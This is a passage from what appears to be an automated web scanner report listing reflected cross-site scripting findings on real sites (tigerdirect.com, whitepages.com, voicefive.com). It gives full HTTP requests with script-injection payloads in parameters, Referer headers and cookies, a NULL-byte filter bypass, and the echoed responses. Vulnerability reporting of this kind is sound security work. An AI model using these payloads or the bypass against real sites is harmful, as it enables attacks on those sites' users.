Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00eb8c3"><a>a3bb50b2646 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb8c3"><a>a3bb50b2646 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /applications/SearchTools/item-details.asp?%00eb8c3"><a>a3bb50b2646=1 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=32; path=/
Set-Cookie: SRVR=WEBX12%2D12B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3F%2500eb8c3%22%3E%3Ca%3Ea3bb50b2646%3D1&Referer=; path=/
Set-Cookie: SessionId=2063113720110129202415173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 100801

<!--V2-->
<!-- Your IP is:64.215.171.109-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
<input type="hidden" name="url" value="http://www.tigerdirect.com/applications/SearchTools/item-details.asp?page=ty&%00eb8c3"><a>a3bb50b2646=1">
...[SNIP]...

5.346. http://msn.whitepages.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.whitepages.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb03c</script><script>alert(1)</script>39657643a5f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=eb03c</script><script>alert(1)</script>39657643a5f

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:50:27 GMT
Connection: close
Set-Cookie: wpn_persistent=max_utype%3Ddefault%26PID%3DTUSnw6wQAEsAADcXd1Q%26times_seen_invite%3D%26filled_demo_survey%3D%26wp_stage%3Dproduction%26persistent_search_count%3D%26had_successful_search%3D; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.whitepages.com
Set-Cookie: wpn_session=xps_5070%3D%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; path=/; domain=.whitepages.com
Content-Length: 34688


            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<!--
               omni_refer('http://www.google.com/search?hl=en&q=eb03c</script><script>alert(1)</script>39657643a5f');
               omni_settings(
                   'Person - Search Form',
                   'MSN 2008 (5070)',
                   'Person Searches',
                   null,
                   'Form',
                   'Valid',
                   'event4'
               );
               
               omni_execute();
           // -->
...[SNIP]...

5.347. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a183e--><script>alert(1)</script>a0c510cb4bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a183e--><script>alert(1)</script>a0c510cb4bc

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 19:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=34; path=/
Set-Cookie: SRVR=WEBX12%2D12B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393%26beta%3DY&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Da183e%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea0c510cb4bc&PHRoutine=10; path=/
Set-Cookie: SRCCODE=WEBGOOSFS; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Set-Cookie: SessionId=2135320220110130141555173193214243; expires=Mon, 30-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 192373

<!--V2-->
<!-- Your IP is:64.215.171.97-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
<!--Cart(Referer) :http://www.google.com/search?hl=en&q=a183e--><script>alert(1)</script>a0c510cb4bc-->
...[SNIP]...

5.348. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload cc810--><script>alert(1)</script>429fd582109 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cc810--><script>alert(1)</script>429fd582109

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100704
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:47 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=3; path=/
Set-Cookie: SRVR=WEBX11%2D09A; path=/
Set-Cookie: SessionId=552337620110129202447173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Dcc810%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E429fd582109&PHRoutine=10; path=/
Set-Cookie: SRCCODE=WEBGOOSFS; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<!--V2-->
<!-- Your IP is:96.17.168.193-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
<!--Cart(Referer) :http://www.google.com/search?hl=en&q=cc810--><script>alert(1)</script>429fd582109-->
...[SNIP]...

5.349. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 92d4b<script>alert(1)</script>adf0fa9a0ac was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-129445681092d4b<script>alert(1)</script>adf0fa9a0ac

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:25 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:40:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351625; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26537

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-129445681092d4b<script>alert(1)</script>adf0fa9a0ac', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan
...[SNIP]...

5.350. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 1be22<script>alert(1)</script>85d24c2bcc4 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&1be22<script>alert(1)</script>85d24c2bcc4; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:24 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:40:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351624; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26537

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&1be22<script>alert(1)</script>85d24c2bcc4', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p85001580": 'exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:
...[SNIP]...

5.351. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload c6787<script>alert(1)</script>17fd908bc32 was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&c6787<script>alert(1)</script>17fd908bc32; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:23 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:40:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351623; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26537

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
oad);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&c6787<script>alert(1)</script>17fd908bc32', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sa
...[SNIP]...

5.352. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 2a025<script>alert(1)</script>d7c608ef8ac was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&2a025<script>alert(1)</script>d7c608ef8ac; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:24 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:40:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351624; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26537

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&2a025<script>alert(1)</script>d7c608ef8ac' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.redacted|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

5.353. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 9b8c5<script>alert(1)</script>dd9b7d29648 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&9b8c5<script>alert(1)</script>dd9b7d29648; UID=1d29d89e-72.246.30.75-1294456810

Response

